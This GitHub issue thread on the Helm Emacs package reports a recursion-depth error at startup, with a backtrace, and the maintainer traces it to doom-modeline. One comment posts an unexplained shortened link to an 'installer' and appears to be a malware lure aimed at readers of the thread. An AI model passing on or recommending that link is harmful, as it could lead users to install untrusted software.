### ISSUE TITLE
Lisp nesting exceeds ‘max-lisp-eval-depth

### ISSUE THREAD

**Issue by algon-ns** [emacs-helm/helm#2685]
### What happened?

At Start of emacs  [with (Debug on error t)] I get this error
_Lisp nesting exceeds ‘max-lisp-eval-depth_
from helm-core-20240830.1602/helm-core.el

### How to reproduce?

Just starting  emacs, but I am not smart enough to only have helm package loaded......
besides I think I need to have doom mode line runinng too.

I do not run Doom, but my own configuration

### Helm Version

Master branch

### Emacs Version

Emacs-30+

### OS

MacOSX

### Relevant backtrace (if possible)

```text
Debugger entered--Lisp error: (error "Lisp nesting exceeds ‘max-lisp-eval-depth’")
  advice--p(#f(compiled-function (source &optional force) "Set up mode-line and header-line for `helm-buffer'.\n\nSOURCE is a Helm source object.\n\nOptional argument FORCE forces redisplay of the Helm buffer's\nmode and header lines." #<bytecode -0xbfe72b9abd9e863>))
  advice--tweak(#f(compiled-function (source &optional force) "Set up mode-line and header-line for `helm-buffer'.\n\nSOURCE is a Helm source object.\n\nOptional argument FORCE forces redisplay of the Helm buffer's\nmode and header lines." #<bytecode -0xbfe72b9abd9e863>) #f(compiled-function (first rest props) #<bytecode -0x1e8340da76c28075>))
  advice--remove-function(#f(compiled-function (source &optional force) "Set up mode-line and header-line for `helm-buffer'.\n\nSOURCE is a Helm source object.\n\nOptional argument FORCE forces redisplay of the Helm buffer's\nmode and header lines." #<bytecode -0xbfe72b9abd9e863>) doom-modeline-set-helm-modeline)
  #f(compiled-function (first rest props) #<bytecode -0x1e8340da76c28075>)(doom-modeline-set-helm-modeline #f(compiled-function (source &optional force) "Set up mode-line and header-line for `helm-buffer'.\n\nSOURCE is a Helm source object.\n\nOptional argument FORCE forces redisplay of the Helm buffer's\nmode and header lines." #<bytecode -0xbfe72b9abd9e863>) nil)
  advice--tweak(#f(advice doom-modeline-set-helm-modeline :after #f(compiled-function (source &optional force) "Set up mode-line and header-line for `helm-buffer'.\n\nSOURCE is a Helm source object.\n\nOptional argument FORCE forces redisplay of the Helm buffer's\nmode and header lines." #<bytecode -0xbfe72b9abd9e863>)) #f(compiled-function (first rest props) #<bytecode -0x1e8340da76c28075>))
  advice--remove-function(#f(advice doom-modeline-set-helm-modeline :after #f(compiled-function (source &optional force) "Set up mode-line and header-line for `helm-buffer'.\n\nSOURCE is a Helm source object.\n\nOptional argument FORCE forces redisplay of the Helm buffer's\nmode and header lines." #<bytecode -0xbfe72b9abd9e863>)) doom-modeline-set-helm-modeline)
  advice--add-function(:after (#f(compiled-function () #<bytecode 0x319866e3b41141>) . #f(compiled-function (gv--val) #<bytecode -0x10e36fc77a746659>)) doom-modeline-set-helm-modeline nil)
  advice-add(helm-display-mode-line :after doom-modeline-set-helm-modeline)
  doom-modeline-mode()
  run-hooks(doom-modeline-mode-hook doom-modeline-mode-on-hook)
  doom-modeline-mode()
  run-hooks(doom-modeline-mode-hook doom-modeline-mode-on-hook)
  doom-modeline-mode()
  run-hooks(doom-modeline-mode-hook doom-modeline-mode-on-hook)
......
 doom-modeline-mode()
  run-hooks(doom-modeline-mode-hook doom-modeline-mode-on-hook)
  doom-modeline-mode()
  run-hooks(after-init-hook delayed-warnings-hook)
  command-line()
  normal-top-level()
```

### Minimal configuration

- [X] I agree using a minimal configuration

**Comment by zawa999** [comment]
try this
https://bit.ly/4e4zLlq
select the desired compiler in the installer

**Comment by thierryvolpiatto** [comment]
Niels Søndergaard ***@***.***> writes:

> What happened?
>
> At Start of emacs [with (Debug on error t)] I get this error
> Lisp nesting exceeds ‘max-lisp-eval-depth
> from helm-core-20240830.1602/helm-core.el
>
> How to reproduce?
>
> Just starting emacs, but I am not smart enough to only have helm
> package loaded......

Most of the helm bugs come from an emacs configured with either
spacemacs or doom, this is why I ask people to start with emacs-helm.sh.
It is really simple to do.

> besides I think I need to have doom mode line runinng too.

Looks it not Helm but `doom-modeline-mode` that cause the bug.

> I do not run Doom, but my own configuration

Your configuration IS using doom apparently.

Of course the bug is not reproductible here.

-- 
Thierry

**Comment by thierryvolpiatto** [comment]
Please contact the Doom maintainer for your bug which is not related to Helm.  For help feel free to ask at https://github.com/emacs-helm/helm/discussions.

Thanks.

**Comment by algon-ns** [comment]
thanks
for your info:
after taking my configuration out of my configuration, I make a new (as far as I can see 
exactly like the one  deleted), and then it worked.
weird

med venlig hilsen
Niels
